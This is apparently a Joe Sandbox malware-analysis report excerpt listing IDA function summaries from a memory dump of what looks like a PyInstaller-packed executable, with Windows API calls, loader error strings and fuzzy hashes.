                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2227656907-0
                                                                                                                                                                                                                                • Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                • Instruction ID: 4dd003f0a9baa62e57c314d9085a4eb1b44ae41356aae1f0d02034da04ccfd10
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5CB1D632B5A682C2EE61EB22D5002B9A394FB44BE4F445173DE5D87BD5DE3DE442E300
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE25840
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE25852
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE25889
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE2589B
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE258B4
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE258C6
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE258DF
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE258F1
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE2590D
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE2591F
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE2593B
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE2594D
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE25969
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE2597B
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE25997
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE259A9
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE259C5
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00007FF6AAE264CF,?,00007FF6AAE2336E), ref: 00007FF6AAE259D7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                • API String ID: 199729137-653951865
                                                                                                                                                                                                                                • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                • Instruction ID: f2d60b259fa3c38d4d33c042e543fd26aa3785afdab5758b2c9ecb7bf0cad834
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1522B370A0BB07D2FA56BF65A82457523A8BF48746F4554FBC41E82260FF7EB04BB210
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE29390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6AAE245F4,00000000,00007FF6AAE21985), ref: 00007FF6AAE293C9
                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6AAE286B7,?,?,00000000,00007FF6AAE23CBB), ref: 00007FF6AAE2822C
                                                                                                                                                                                                                                  • Part of subcall function 00007FF6AAE22810: MessageBoxW.USER32 ref: 00007FF6AAE228EA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                • Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                • Instruction ID: 9cb142fc2ed73f734cc48efa1acfb311225d396f5d19cd24626de28baffbc51f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 14516831B1F683C2FE60BF25E8552B96254BF94780F4454F3D64EC26D5EE2CE50AA740
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                • Opcode ID: 8472b8ede698ad59e20299db8414a67636df66db3170d2eb7fd9aa75899a1f79
                                                                                                                                                                                                                                • Instruction ID: d18ec27516c9eba71bdf2bafad10729bccff6497e1fd522ab5143b55901836cb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8472b8ede698ad59e20299db8414a67636df66db3170d2eb7fd9aa75899a1f79
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B9518B71B0A647D2EE10BF21D4405B9A3A0BF84794F4845F3EE4C877A6DE3DE64AA700
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                • String ID: P%
                                                                                                                                                                                                                                • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                • Instruction ID: 6d9b04696073233c5a61a00820151604a07ca68d8f80f4a1d3dd4b02a6311ec7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7251D7366057A1C7D6349F26E4181BAB7A1F798B61F004126EBDE83694DF3CD046DB10
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                • Instruction ID: 358a0e6c4829a0e37d07d3d9d116d7a20036d907fe45bbed10f345fe739dceea
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A9219731B0AA83C2EB45AF7AF8541796354FF88B90F5841B2DA1DC33D5DE2CD5969301
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                • Instruction ID: 7a6682f9af5b027a38a685b351b24576b898728b7c36f6deb0c9136ed77da11c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F128F71E0A243C6FB207B25D15427BF6A2FB40750F844177E6CA866E4DF7CE582AB24
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                • Instruction ID: 04806ecdfd0c6170b5d1e534e1794dafdfa5c514d6560263623336fa63cf502f
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82127371E0E143C6FF207A15D0546B9F6A1FB80750F89407BD6DA869E4DF7CE482AB20
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                • Opcode ID: 5f9ac61c4634f14af73609514e5f445c642ea9b9336f4c7371d010a938d3b4e4
                                                                                                                                                                                                                                • Instruction ID: 910e5d825557911a0ee2181200a89e97135e7d52a07345382a2dc1689e2dd31d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5f9ac61c4634f14af73609514e5f445c642ea9b9336f4c7371d010a938d3b4e4
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41414A31A0A653C2EE10FF12A8006BAA394BF44B84F4444F3ED4D87796DE3CE60BA740
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                • Instruction ID: 1acb110b4fe2f3e123ec69ff9acffd563d0d77447f329af2279db24a544cbc95
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2BD17E32A09752CAEF20AF65D4803AD7BA4FB45788F1001B6DE4D97B95CF38E49AD701
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF6AAE3F0AA,?,?,000001E7CFBF9958,00007FF6AAE3AD53,?,?,?,00007FF6AAE3AC4A,?,?,?,00007FF6AAE35F3E), ref: 00007FF6AAE3EE8C
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF6AAE3F0AA,?,?,000001E7CFBF9958,00007FF6AAE3AD53,?,?,?,00007FF6AAE3AC4A,?,?,?,00007FF6AAE35F3E), ref: 00007FF6AAE3EE98
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAE64000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707781277.00007FF6AAEA9000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_20_2_7ff6aae20000_z2_3yhxvvYYX1CmTdADYCHAQ.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                • Opcode ID: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                • Instruction ID: 909a78657a549d393d13761a948cbd2fc0e89a766a1e99a6b2a8ff041c2ce494
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 113d78e4ddfca44ef7199ea688f338981f8b4522c7c5ddaba00381c3941a83e2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6D41E331B1BA02C1FA15EB16A81057563E5BF48B90F88857BDD5EC77A4EF3CE806A310
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6AAE23706,?,00007FF6AAE23804), ref: 00007FF6AAE22C9E
                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6AAE23706,?,00007FF6AAE23804), ref: 00007FF6AAE22D63
                                                                                                                                                                                                                                • MessageBoxW.USER32 ref: 00007FF6AAE22D99
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000014.00000002.2707454748.00007FF6AAE21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6AAE20000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707327408.00007FF6AAE20000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707553849.00007FF6AAE4B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE5E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000014.00000002.2707647158.00007FF6AAE61000.00000004.00000001.01000000.00000008.sdmpDownload File
